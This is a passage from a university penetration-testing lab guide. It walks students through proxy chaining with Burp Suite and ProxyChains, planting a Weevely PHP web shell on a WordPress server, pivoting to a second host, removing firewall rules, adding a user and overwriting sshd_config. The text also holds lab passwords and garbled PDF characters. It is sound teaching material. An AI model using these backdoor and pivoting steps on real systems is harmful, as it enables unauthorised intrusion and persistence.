a. Open the Mozilla Firefox web browser (click on Applica!ons, then Web Browser) provided within the distribu!on of Kali
Linux that you are currently using in this exercise.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 35 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
b. Go to the se%ngs of the browser and open the network configura!on se%ngs by following the steps below.
A#er the browser is open, click on the “Burger” icon near the top right corner of the browser window to display
the browser menu.
Then, click on the advanced bu"on on the le# side of the screen.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 36 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Finally, click on “Network”, then “Se%ngs” to display the Connec!on Se%ngs to be edited.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 37 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Select Manual proxy configura!on (see below). Enter the values of the “HTTP Proxy” and “Port” and then click OK.
a. Minimize all open windows and launch Burp Suite. The Burp Suite applica!on can be launched from the “Applica!ons”
menu, under the “Web Applica!on Analysis” submenu.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 38 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
h. In the Socks Proxy sec!on of the “User op!ons”, set the following values:
Note: You might need to first type in the SOCKS proxy host and the SOCKS proxy port before being able to select “Use
SOCKS proxy”. Please make sure that this op!on is selected before moving forward.
i. Within Burp Suite, also disable the packet intercep!on by going to the Proxy tab, and toggling the message intercept
bu"on to the off .
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 39 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Step 3 – Edi!ng the “proxychains.conf” configura!on file using the VI text editor
Now, you will use the first web server to force connec!on based on the next exploit. Open a new terminal and type the
following command.
a. Open the “proxychains.conf” file using VI text editor (A user guide for VI is at the following link:
h"ps://www.howtogeek.com/102468/a-beginners-guide-to-edi!ng-text-files-with-vi/
(h"p://www.howtogeek.com/102468/a-beginners-guide-to-edi!ng-text-files-with-vi/)) ) with the following command:
$ sudo vi /etc/proxychains.conf
Note: If prompted, please provide the password, Cyb3rl@b, for the StudentFirst account.
b. Scroll to the bo"om of the screen and configura!on file and press the le"er “i” on your keyboard to put vi in edi!ng mode.
Before con!nuing, comment out the following line by adding a “#” in front of it. This is to render that line of configura!on
inac!ve (i.e. this replaces “socks4 127.0.0.1 9050” line by “socks5 127.0.0.1 3434”).
d. When you are done edi!ng, press the escape key, “Esc”,
e. Type the following command and hit “Enter” to save the configura!on file and quit the vi applica!on:
:wq
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 40 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Now that the ProxyChain is set, you’ll use Weevely to build a new payload.
a. In terminal, use the following command to generate a new payload called “wee.php” on the Desktop and assign it the
password “pass” (Enter the password for StudentFirst (Cyb3rl@b) if you are prompted to).
Note: For this step to be completed successfully you must have the SSH connection to the first webserver (192.168.10.111
192.168.10.111) active
using bob’s account. If the SSH connection is not active, open a terminal windows and reestablish it using the following command:
Note: When prompted, first, enter the password for the “StudentFirst
StudentFirst” account, “Cyb3rl@b
Cyb3rl@b”. Then, enter the password for “bob
bob”,
“bobpass
bobpass”.
a. From the desktop of your NIXATK01 VM, double click and open the “Lab Resources” folder.
c. Click on the “Download Project resources” shortcut to get to the “CST630Project Resources” page.
Note: When the file is uploaded, you will see {"success": true,"fileName":"\/\/\/wee.php"}” on the web page. This means
that the file was successfully uploaded to the web server.
A#er the file is uploaded, make sure you can see it within the directory lis!ng on the web server.
a. Browse to the upload directory by using the following URL from your NIXATK01 VM: hr.acme.com/wordpress/wp-
content/uploads
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 42 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
a. Open a terminal and enter the following command (Enter the password for StudentFirst (Cyb3rl@b) if you are prompted
to):
A#er you enter this command, you will see the following screen:
b. At this point, you will need to enter a Linux-based commands to interact with the system. In the terminal, you may try the
following commands:
Weevely> help
Weevely> uname
Weevely> system_info
Weevely> audit_phpconf
Weevely> audit_etcpasswd
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 43 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
In the previous step, you’ve successfully established a backdoor connec!on to the second webserver using pivo!ng techniques
by taking advantage of your ini!al SSH connec!on to the first webserver. However, you will have issues directly connec!ng
the second webserver due to rou!ng restric!ons. As a result, you need to remove the rou!ng restric!ons to allow you to
directly SSH to the host.
a. Type the following command to list the iptables (Enter the password for StudentFirst (Cyb3rl@b) if you are prompted to):
b. Delete the REJECT restric!on for the Kali host using the following command (Enter the password for StudentFirst
(Cyb3rl@b) if you are prompted to).
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 44 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
a. Add a user to the system. Enter the following command (Enter the password for StudentFirst (Cyb3rl@b) if you are
prompted to).
b. Change alice’s password using the follwing command (Enter the password for StudentFirst (Cyb3rl@b) if you are prompted
to):
Now, remove the proxy setup from the browser by reversing the steps you did earlier in Part 6.
As in with the first webserver, in order to successfully establish an SSH connec!on, you need to edit the “sshd_config” file and
overwrite the original file on the webserver. However, you’ve already edited the file and kept a copy on the desktop of you
NIXATK01, Kali VM. Hence, all you need to do at this point is to overwrite the server’s original copy of the file. The following
steps will help you accomplish this goal.
a. Upload the edited copy of the “sshd_config” file to the “tmp” directory on the second webserver
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 45 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
b. Overwrite the “sshd_config” file on the webserser (Enter the password for StudentFirst (Cyb3rl@b) if you are prompted
to):
c. Restart the sshd service. Enter the following command (Enter the password for StudentFirst (Cyb3rl@b) if you are
prompted to):
d. Open a new terminal and Type the following command to SSH back to the host (second webserver) (Enter the password
for StudentFirst (Cyb3rl@b) if you are prompted to).
- Open a new terminal (On NIXATK01) and run the following command (Enter the password for StudentFirst (Cyb3rl@b) if you
are prompted to):
Note: You will see some new output when running this command. That output will look like the top part of the screen below.
This is showing how ProxyChains is building the connec!ons. This command will take !me to run.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 46 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Note: Now that you have access to the two systems in the network, see if you can get root on either host.
Congratula!ons! You have now reached the end of the lab! Close all applica!ons and exit the virtual lab, and ensure that you
compile your findings in your lab report for submission.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 47 of 47